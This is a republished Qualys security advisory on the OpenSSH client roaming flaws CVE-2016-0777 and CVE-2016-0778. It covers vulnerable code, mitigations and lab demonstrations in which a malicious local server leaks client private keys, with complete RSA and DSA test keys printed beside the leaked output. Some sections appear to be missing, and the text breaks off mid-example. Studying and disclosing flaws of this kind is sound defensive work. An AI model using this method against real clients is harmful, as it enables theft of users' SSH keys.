tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. \nQualys Security Advisory\n\nRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nInformation Leak (CVE-2016-0777)\n- Analysis\n- Private Key Disclosure\n- Mitigating Factors\n- Examples\nBuffer Overflow (CVE-2016-0778)\n- Analysis\n- Mitigating Factors\n- File Descriptor Leak\nAcknowledgments\nProof Of Concept\n\n\n========================================================================\nSummary\n========================================================================\n\nSince version 5.4 (released on March 8, 2010), the OpenSSH client\nsupports an undocumented feature called roaming: if the connection to an\nSSH server breaks unexpectedly, and if the server supports roaming as\nwell, the client is able to reconnect to the server and resume the\nsuspended SSH session. This information leak may have already been exploited in\nthe wild by sophisticated attackers, and high-profile sites or users may\nneed to regenerate their SSH keys accordingly. \n\nThe buffer overflow, on the other hand, is present in the default\nconfiguration of the OpenSSH client but its exploitation requires two\nnon-default options: a ProxyCommand, and either ForwardAgent (-A) or\nForwardX11 (-X). This buffer overflow is therefore unlikely to have any\nreal-world impact, but provides a particularly interesting case study. \n\nAll OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be\neasily hot-fixed by setting the undocumented option \"UseRoaming\" to\n\"no\", as detailed in the Mitigating Factors section. OpenSSH version\n7.1p2 (released on January 14, 2016) disables roaming by default. \n\n\n========================================================================\nInformation Leak (CVE-2016-0777)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nIf the OpenSSH client connects to an SSH server that offers the key\nexchange algorithm \"resume@appgate.com\", it sends the global request\n\"roaming@appgate.com\" to the server, after successful authentication. If\nthis request is accepted, the client allocates a roaming buffer out_buf,\nby calling malloc() (and not calloc()) with an out_buf_size that is\narbitrarily chosen by the server:\n\n 63 void\n 64 roaming_reply(int type, u_int32_t seq, void *ctxt)\n 65 {\n 66 if (type == SSH2_MSG_REQUEST_FAILURE) {\n 67 logit(\"Server denied roaming\");\n 68 return;\n 69 }\n 70 verbose(\"Roaming enabled\");\n .. \n 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size());\n .. \n 77 }\n\n 40 static size_t out_buf_size = 0;\n 41 static char *out_buf = NULL;\n 42 static size_t out_start;\n 43 static size_t out_last;\n .. \n 75 void\n 76 set_out_buffer_size(size_t size)\n 77 {\n 78 if (size == 0 || size \u003e MAX_ROAMBUF)\n 79 fatal(\"%s: bad buffer size %lu\", __func__, (u_long)size);\n 80 /*\n 81 * The buffer size can only be set once and the buffer will live\n 82 * as long as the session lives. \n 83 */\n 84 if (out_buf == NULL) {\n 85 out_buf_size = size;\n 86 out_buf = xmalloc(size);\n 87 out_start = 0;\n 88 out_last = 0;\n 89 }\n 90 }\n\nThe OpenSSH client\u0027s roaming_write() function, a simple wrapper around\nwrite(), calls wait_for_roaming_reconnect() to transparently reconnect\nto the SSH server after a disconnection. It also calls buf_append() to\ncopy the data sent to the server into the roaming buffer out_buf. During\na reconnection, the client is therefore able to resend the data that was\nnot received by the server because of the disconnection:\n\n198 void\n199 resend_bytes(int fd, u_int64_t *offset)\n200 {\n201 size_t available, needed;\n202\n203 if (out_start \u003c out_last)\n204 available = out_last - out_start;\n205 else\n206 available = out_buf_size;\n207 needed = write_bytes - *offset;\n208 debug3(\"resend_bytes: resend %lu bytes from %llu\",\n209 (unsigned long)needed, (unsigned long long)*offset);\n210 if (needed \u003e available)\n211 fatal(\"Needed to resend more data than in the cache\");\n212 if (out_last \u003c needed) {\n213 int chunkend = needed - out_last;\n214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend,\n215 chunkend);\n216 atomicio(vwrite, fd, out_buf, out_last);\n217 } else {\n218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed);\n219 }\n220 }\n\nIn the OpenSSH client\u0027s roaming buffer out_buf, the most recent data\nsent to the server begins at index out_start and ends at index out_last. \nAs soon as this circular buffer is full, buf_append() maintains the\ninvariant \"out_start = out_last + 1\", and consequently three different\ncases have to be considered:\n\n- \"out_start \u003c out_last\" (lines 203-204): out_buf is not full yet (and\n out_start is still equal to 0), and the amount of data available in\n out_buf is indeed \"out_last - out_start\";\n\n- \"out_start \u003e out_last\" (lines 205-206): out_buf is full (and out_start\n is exactly equal to \"out_last + 1\"), and the amount of data available\n in out_buf is indeed the entire out_buf_size;\n\n- \"out_start == out_last\" (lines 205-206): no data was ever written to\n out_buf (and both out_start and out_last are still equal to 0) because\n no data was ever sent to the server after roaming_reply() was called,\n but the client sends (leaks) the entire uninitialized out_buf to the\n server (line 214), as if out_buf_size bytes of data were available. \n\nIn order to successfully exploit this information leak and retrieve\nsensitive information from the OpenSSH client\u0027s memory (for example,\nprivate SSH keys, or memory addresses useful for further exploitation),\na malicious server needs to:\n\n- Massage the client\u0027s heap before roaming_reply() malloc()ates out_buf,\n and force malloc() to return a previously free()d but uncleansed chunk\n of sensitive information. The simple proof-of-concept in this advisory\n does not implement heap massaging. \n\n- Guess the client\u0027s get_snd_buf_size() in order to precisely control\n out_buf_size. OpenSSH \u003c 6.0 accepts out_buf sizes in the range (0,4G),\n and OpenSSH \u003e= 6.0 accepts sizes in the range (0,2M]. Sizes smaller\n than get_snd_buf_size() are attainable because roaming_reply() does\n not protect \"packet_get_int() + get_snd_buf_size()\" against integer\n wraparound. The proof-of-concept in this advisory attempts to derive\n the client\u0027s get_snd_buf_size() from the get_recv_buf_size() sent by\n the client to the server, and simply chooses a random out_buf_size. \n\n- Advise the client\u0027s resend_bytes() that all \"available\" bytes (the\n entire out_buf_size) are \"needed\" by the server, even if fewer bytes\n were actually written by the client to the server (because the server\n controls the \"*offset\" argument, and resend_bytes() does not protect\n \"needed = write_bytes - *offset\" against integer wraparound). \n\nFinally, a brief digression on a minor bug in resend_bytes(): on 64-bit\nsystems, where \"chunkend\" is a 32-bit signed integer, but \"out_buf\" and\n\"out_buf_size\" are 64-bit variables, \"out_buf + out_buf_size - chunkend\"\nmay point out-of-bounds, if chunkend is negative (if out_buf_size is in\nthe [2G,4G) range). This negative chunkend is then converted to a 64-bit\nsize_t greater than SSIZE_MAX when passed to atomicio(), and eventually\nreturns EFAULT when passed to write() (at least on Linux and OpenBSD),\nthus avoiding an out-of-bounds read from the OpenSSH client\u0027s memory. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure\n------------------------------------------------------------------------\n\nWe initially believed that this information leak in the OpenSSH client\u0027s\nroaming code would not allow a malicious SSH server to steal the\nclient\u0027s private keys, because:\n\n- the information leaked is not read from out-of-bounds memory, but from\n a previously free()d chunk of memory that is recycled to malloc()ate\n the client\u0027s roaming buffer out_buf;\n\n- private keys are loaded from disk into memory and freed by key_free()\n (old API, OpenSSH \u003c 6.7) or sshkey_free() (new API, OpenSSH \u003e= 6.7),\n and both functions properly cleanse the private keys\u0027 memory with\n OPENSSL_cleanse() or explicit_bzero();\n\n- temporary copies of in-memory private keys are freed by buffer_free()\n (old API) or sshbuf_free() (new API), and both functions attempt to\n cleanse these copies with memset() or bzero(). \n\nHowever, we eventually identified three reasons why, in our experiments,\nwe were able to partially or completely retrieve the OpenSSH client\u0027s\nprivate keys through this information leak (depending on the client\u0027s\nversion, compiler, operating system, heap layout, and private keys):\n\n(besides these three reasons, other reasons may exist, as suggested by\nthe CentOS and Fedora examples at the end of this section)\n\n1. If a private SSH key is loaded from disk into memory by fopen() (or\nfdopen()), fgets(), and fclose(), a partial or complete copy of this\nprivate key may remain uncleansed in memory. Indeed, these functions\nmanage their own internal buffers, and whether these buffers are\ncleansed or not depends on the OpenSSH client\u0027s libc (stdio)\nimplementation, but not on OpenSSH itself. \n\n- In all vulnerable OpenSSH versions, SSH\u0027s main() function calls\n load_public_identity_files(), which loads the client\u0027s public keys\n with fopen(), fgets(), and fclose(). Unfortunately, the private keys\n (without the \".pub\" suffix) are loaded first and then discarded, but\n nonetheless buffered in memory by the stdio functions. \n\n- In OpenSSH versions \u003c= 5.6, the load_identity_file() function (called\n by the client\u0027s public-key authentication method) loads a private key\n with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses\n fgets() and hence internal stdio buffering. \n\nInternal stdio buffering is the most severe of the three problems\ndiscussed in this section, although GNU/Linux is not affected because\nthe glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. \nBSD-based systems, on the other hand, are severely affected because they\nsimply malloc()ate and free() stdio buffers. For interesting comments on\nthis issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk\n\n2. In OpenSSH versions \u003e= 5.9, the client\u0027s load_identity_file()\nfunction (called by the public-key authentication method) read()s a\nprivate key in 1024-byte chunks that are appended to a growing buffer (a\nrealloc()ating buffer) with buffer_append() (old API) or sshbuf_put()\n(new API). Unfortunately, the repeated calls to realloc() may leave\npartial copies of the private key uncleansed in memory. \n\n- In OpenSSH \u003c 6.7 (old API), the initial size of such a growing buffer\n is 4096 bytes: if a private-key file is larger than 4K, a partial copy\n of this private key may remain uncleansed in memory (a 3K copy in a 4K\n buffer). Fortunately, only the file of a very large RSA key (for\n example, an 8192-bit RSA key) can exceed 4K. \n\n- In OpenSSH \u003e= 6.7 (new API), the initial size of a growing buffer is\n 256 bytes: if a private-key file is larger than 1K (the size passed to\n read()), a partial copy of this private key may remain uncleansed in\n memory (a 1K copy in a 1K buffer). For example, the file of a\n default-sized 2048-bit RSA key exceeds 1K. \n\nFor more information on this issue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources\n\nhttps://cwe.mitre.org/data/definitions/244.html\n\n3. An OpenSSH growing-buffer that holds a private key is eventually\nfreed by buffer_free() (old API) or sshbuf_free() (new API), and both\nfunctions attempt to cleanse the buffer with memset() or bzero() before\nthey call free(). Unfortunately, an optimizing compiler may remove this\nmemset() or bzero() call, because the buffer is written to, but never\nagain read from (an optimization known as Dead Store Elimination). \n\nOpenSSH 6.6 is the only version that is not affected, because it calls\nexplicit_bzero() instead of memset() or bzero(). \n\nDead Store Elimination is the least severe of the three problems\nexplored in this section, because older GCC versions do not remove the\nmemset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5\nand Clang/LLVM do, however, remove it. For detailed discussions of this\nissue:\n\nhttps://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations\n\nhttps://cwe.mitre.org/data/definitions/14.html\n\nhttps://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506\n\nFinally, for these three reasons, passphrase-encrypted SSH keys are\nleaked in their encrypted form, but an attacker may attempt to crack the\npassphrase offline. On the other hand, SSH keys that are available only\nthrough an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\"). \n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak:\n\n# \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume]^Z\n[1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak:\n\n$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.ls\"\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 \"cat \u003e /tmp/passwd.tar\"\ntar: Removing leading `/\u0027 from member names\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n... \n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\nSimilarly, the SCP client uses the SSH client\u0027s stdin and stdout to\ntransfer data, and can be forced by a malicious SSH server to output a\ncontrol record that ends in \u0027\\n\u0027 (an error message in server-to-client\nmode, or file permissions in client-to-server mode); this \u0027\\n\u0027 is then\nread from stdin by the fgetc() call in wait_for_roaming_reconnect(), and\ntriggers an automatic reconnection that allows the information leak to\nbe exploited without user interaction:\n\n# env ROAMING=\"scp_mode sleep:1\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp\n$ [connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\n\n$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp\n[connection suspended, press return to resume][connection resumed]\n[connection suspended, press return to resume][exiting]\nlost connection\n\n3. Although a man-in-the-middle attacker can reset the TCP connection\nbetween an OpenSSH client and an OpenSSH server (which does not support\nroaming), it cannot exploit the information leak without breaking server\nhost authentication or integrity protection, because it needs to:\n\n- first, append the \"resume@appgate.com\" algorithm name to the server\u0027s\n initial key exchange message;\n\n- second, in response to the client\u0027s \"roaming@appgate.com\" request,\n change the server\u0027s reply from failure to success. \n\nIn conclusion, an attacker who wishes to exploit this information leak\nmust convince its target OpenSSH client to connect to a malicious server\n(an unlikely scenario), or compromise a trusted server (a more likely\nscenario, for a determined attacker). \n\n4. In the client, wait_for_roaming_reconnect()\ncalls ssh_connect(), the same function that successfully established the\nfirst connection to the server; this function supports four different\nconnection methods, but each method contains a bug and may fail to\nestablish a second connection to the server:\n\n- In OpenSSH \u003e= 6.5 (released on January 30, 2014), the default\n ssh_connect_direct() method (a simple TCP connection) is called by\n wait_for_roaming_reconnect() with a NULL aitop argument, which makes\n it impossible for the client to reconnect to the server:\n\n 418 static int\n 419 ssh_connect_direct(const char *host, struct addrinfo *aitop,\n ... \n 424 int sock = -1, attempt;\n 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV];\n ... \n 430 for (attempt = 0; attempt \u003c connection_attempts; attempt++) {\n ... \n 440 for (ai = aitop; ai; ai = ai-\u003eai_next) {\n ... \n 470 }\n 471 if (sock != -1)\n 472 break; /* Successful connection. */\n 473 }\n 474\n 475 /* Return failure if we didn\u0027t get a successful connection. */\n 476 if (sock == -1) {\n 477 error(\"ssh: connect to host %s port %s: %s\",\n 478 host, strport, strerror(errno));\n 479 return (-1);\n 480 }\n\n Incidentally, this error() call displays stack memory from the\n uninitialized strport[] array, a byproduct of the NULL aitop:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n[reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \\300\\350\\226\\373\\341: Bad file descriptor\n\n- The special ProxyCommand \"-\" communicates with the server through the\n client\u0027s stdin and stdout, but these file descriptors are close()d by\n packet_backup_state() at the beginning of wait_for_roaming_reconnect()\n and are never reopened again, making it impossible for the client to\n reconnect to the server. Moreover, the fgetc() that waits for \u0027\\n\u0027 or\n \u0027\\r\u0027 on the closed stdin returns EOF and forces the client to exit():\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/nc -e \"/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1\" 127.0.0.1 222\nPseudo-terminal will not be allocated because stdin is not a terminal. \nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that\n passes a connected file descriptor back to the client, but it calls\n fatal() while reconnecting to the server, because waitpid() returns\n ECHILD; indeed, the SIGCHLD handler (installed by SSH\u0027s main() after\n the first successful connection to the server) calls waitpid() before\n ssh_proxy_fdpass_connect() does:\n\n1782 static void\n1783 main_sigchld_handler(int sig)\n1784 {\n.... \n1789 while ((pid = waitpid(-1, \u0026status, WNOHANG)) \u003e 0 ||\n1790 (pid \u003c 0 \u0026\u0026 errno == EINTR))\n1791 ;\n1792\n1793 signal(sig, main_sigchld_handler);\n.... \n1795 }\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 121 /* Fork and execute the proxy command. */\n 122 if ((pid = fork()) == 0) {\n ... \n 157 }\n 158 /* Parent. */\n ... \n 167 while (waitpid(pid, NULL, 0) == -1)\n 168 if (errno != EINTR)\n 169 fatal(\"Couldn\u0027t wait for child: %s\", strerror(errno));\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015\n\n$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand=\"/usr/bin/nc -F %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Couldn\u0027t wait for child: No child processes\n\n- The method ssh_proxy_connect() fork()s a standard ProxyCommand that\n connects the client to the server, but if a disconnection occurs, and\n the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is\n waiting for a \u0027\\n\u0027 or \u0027\\r\u0027 on stdin, EOF is returned (the underlying\n read() returns EINTR) and the client exit()s before it can reconnect\n to the server:\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh -o ProxyCommand=\"/bin/nc %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][exiting]\n\n This behavior is intriguing, because (at least on Linux and BSD) the\n signal() call that installed the main_sigchld_handler() is supposed to\n be equivalent to a sigaction() call with SA_RESTART. However, portable\n versions of OpenSSH override signal() with mysignal(), a function that\n calls sigaction() without SA_RESTART. \n\n This last mitigating factor is actually a race-condition bug that\n depends on the ProxyCommand itself: for example, the client never\n fails to reconnect to the server when using Socat as a ProxyCommand,\n but fails occasionally when using Netcat. \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\nvOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi\n/rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE\nK+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr\n+7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n\nUxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7\nqsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11\n1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV\npmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:1280\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-97ed9f59/infoleak\nMIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr\nqlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T\nM3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0\n9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd\na3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD\nzzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+\neIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE\nw3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk\noayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc\nbvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C\nvcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW\nhZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW\nbc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd\nmuzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP\nwn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF\niKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw\nsj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: FreeBSD 9.2, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nFreeBSD 9.2-RELEASE (GENERIC) #0 r255898: Fri Sep 27 03:52:52 UTC 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.2p2, OpenSSL 0.9.8y 5 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"client_out_buf_size:768\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-9448bb7f/infoleak\nMIIBugIBAAKBgQCEfEo25eMTu/xrpVQxBGEjW/WEfeH4jfqaCDluPBlcl5dFd8KP\ngrGm6fh8c+xdNYRg+ogHwM3uDG5aY62X804UGysCUoY5isSDkkwGrbbemHxR/Cxe\n4bxlIbQrw8KY39xLOY0hC5mpPnB01Cr+otxanYUTpsb8gpEngVvK619O0wIVAJwY\n8RLHmLnPaMFSOvYvGW6eZNgtAoGACkP73ltWMdHM1d0W8Tv403yRPaoCRIiTVQOw\noM8/PQ1JVFmBJxrJXtFJo88TevlDHLEghapj4Wvpx8NJY917bC425T2zDlJ4L9rP\nIeOjqy+HwGtDXjTHspmGy59CNe8E6vowZ3XM4HYH0n4GcwHvmzbhjJxYGmGJrng4\ncRh4VTwCgYAPxVV+3eA46WWZzlnttzxnrr/w/9yUC/DfrKKQ2OGSQ9zyVn7QEEI+\niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\n... \n\n# env ROAMING=\"client_out_buf_size:1024\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n[connection suspended, press return to resume][connection resumed]\n\n# cat /tmp/roaming-279f5e2b/infoleak\n... \niUB2lkeMqjNwPkxddONOBZB7kFmjOS69Qp0mfmsRf15xneqU8IoMSwqa5LOXM0To\nzEpLjvCtyTJcJgz2oHglVUJqGAx8CQJq2wS+eiSQqJbQpmexNa5GfwIUKbRxQKlh\nPHatTfiy5p82Q8+TD60=\n... \n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: OpenBSD 5.4, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ head -n 1 /etc/motd\nOpenBSD 5.4 (GENERIC) #37: Tue Jul 30 15:24:05 MDT 2013\n\n$ /usr/bin/ssh -V\nOpenSSH_6.3, OpenSSL 1.0.1c 10 May 2012\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE 